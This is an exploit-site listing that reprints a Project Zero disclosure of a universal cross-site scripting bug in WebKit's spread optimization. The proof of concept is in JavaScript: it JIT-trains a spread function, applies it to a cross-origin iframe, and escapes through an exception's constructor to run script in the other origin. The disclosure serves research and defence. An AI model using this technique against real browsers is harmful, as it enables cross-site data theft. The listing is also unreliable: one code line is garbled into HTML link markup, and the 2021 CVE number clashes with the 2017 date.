WebKit operationSpreadGeneric Universal Cross Site Scripting

CVE	Category	Price	Severity
CVE-2021-1848	CWE-79	Not specified	High

Author	Risk	Exploitation Type	Date
Google Project Zero	Critical	Remote	2017-04-19

CPE
cpe:cpe:/a:webkit:webkit

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017040121

Below is a copy:

WebKit operationSpreadGeneric Universal Cross Site Scripting WebKit: UXSS via operationSpreadGeneric 




Once a spread operation is optimized, the function |operationSpreadGeneric| will be called from then on. But operationSpreadGeneric's trying to get a JSGlobalObject from the argument of a spread operation.

It seems that that optimization is not implemented to the release version of Safari yet.

Tested on the Nighly 10.0.2(12602.3.12.0.1, <a href="https://crrev.com/210957" title="" class="" rel="nofollow">r210957</a>)

PoC:
<body>
<script>

'use strict';

function spread(a) {
    return [...a];
}

let arr = Object.create([1, 2, 3, 4]);
for (let i = 0; i < 0x10000; i++) {
    spread(arr);
}

let f = document.body.appendChild(document.createElement('iframe'));
f.onload = () => {
    f.onload = null;

    try {
        spread(f.contentWindow);
    } catch (e) {
        e.constructor.constructor('alert(location)')();
    }
};

f.src = '<a href="https://abc.xyz/';" title="" class="" rel="nofollow">https://abc.xyz/';</a>

</script>
</body>


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.




Found by: lokihardt

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum